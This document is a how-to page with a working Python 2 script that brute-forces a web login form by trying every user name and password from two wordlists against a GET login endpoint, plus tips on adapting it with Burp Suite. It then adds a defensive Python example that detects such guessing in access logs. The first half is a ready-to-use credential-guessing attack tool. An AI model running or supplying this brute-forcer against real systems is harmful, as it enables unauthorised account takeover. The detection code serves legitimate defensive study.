Web form login brute force
This tool brute-forces the user name and password inputs of a given HTTP web application login form.
User names and passwords are read from the files opened through the fp and fd variables. Put the path of the user name list in fp and the path of the password list in fd, in that order.
Change the IP address to that of your own instance; a host name also works.
The var2 variable is the location, or page, on the host mentioned above that we are going to attack. In other words, it is the request sent to the server.
Take note of the line if "Bad User or Password" in reple: this string should be changed in accordance with the response you get back.
It is very easy to find out what the request should be and what the response will be by using the Burp Suite proxy. Use it to examine the HTTP transactions and decide what they should be.
import httplib

def sendreq(username, password):
    # The request line; user name and password travel in the query string
    var2 = "/System.xml?action=login&user="+username+"&password="+password
    req = httplib.HTTPConnection("192.168.8.100")
    req.putrequest("GET",var2)
    req.putheader("Host","192.168.8.100")
    req.endheaders()
    req.send("")
    rep = req.getresponse()
    #print (headers)
    #print statusmsg
    # Return the response body so the caller can look for the failure string
    bdrep = rep.read()
    return bdrep

done = False
#(statuscode, statusmsg, headers)= req.getreply()
# fp is the user name list, fd is the password list
fp = open("/home/avishka/Documents/ulist.txt","r")
fd = open("/home/avishka/Documents/plist.txt","r")
uname = []
passls = []
for line in fp:
    print line
    uname.append(line.rstrip())
for line in fd:
    print line
    passls.append(line.rstrip())

# Try every user name with every password
for unfl in uname:
    for passfl in passls:
        reple = sendreq(unfl, passfl)
        # Change this string to match the failure response of your application
        if "Bad User or Password" in reple:
            print "user name : "+unfl+" password : "+passfl+" wrong"
        else:
            print "user name : "+unfl+" password : "+passfl+ " Worked"
            done = True
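
From the defender's side this traffic stands out in the web server's access log, because every guess is a GET to /System.xml?action=login with the user name in the query string. The following is an added example, not part of the original tool: the log format, the constructed sample lines, the threshold and the function names are all assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (common log format, documentation IPs), not real traffic.
_FMT = '%s - - [12/Mar/2024:10:%s +0000] "GET %s HTTP/1.1" 200 31'
SAMPLE_LOG = "\n".join(
    # One source guessing eight passwords in eight seconds
    [_FMT % ("192.0.2.10", "00:%02d" % i,
             "/System.xml?action=login&user=%s&password=p%d"
             % ("admin" if i < 4 else "root", i)) for i in range(8)]
    # An ordinary user who mistypes once, plus an unrelated page request
    + [_FMT % ("198.51.100.7", "05:00", "/System.xml?action=login&user=bob&password=x"),
       _FMT % ("198.51.100.7", "05:30", "/System.xml?action=login&user=bob&password=y"),
       _FMT % ("198.51.100.7", "05:31", "/index.html")])

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) HTTP/[\d.]+" ')

def login_attempts(log_text):
    """Yield (source_ip, timestamp, username) for every login request in the log."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query)
        if url.path != "/System.xml" or query.get("action") != ["login"]:
            continue
        # The password value is deliberately never read or stored here.
        yield ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), query.get("user", [""])[0]

def detect_bruteforce(log_text, max_attempts=5, window=timedelta(seconds=60)):
    """Return {ip: user names tried} for sources with more than max_attempts
    login requests inside any sliding window. Assumes time-ordered log lines."""
    recent = defaultdict(deque)   # ip -> (timestamp, user) pairs still in the window
    flagged = defaultdict(set)
    for ip, when, user in login_attempts(log_text):
        q = recent[ip]
        q.append((when, user))
        while when - q[0][0] > window:
            q.popleft()
        if len(q) > max_attempts:
            flagged[ip].update(u for _, u in q)
    return {ip: sorted(users) for ip, users in flagged.items()}

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

Because the credentials travel in the URL, the same access log also holds every submitted password in clear text, so the log itself has to be treated as sensitive.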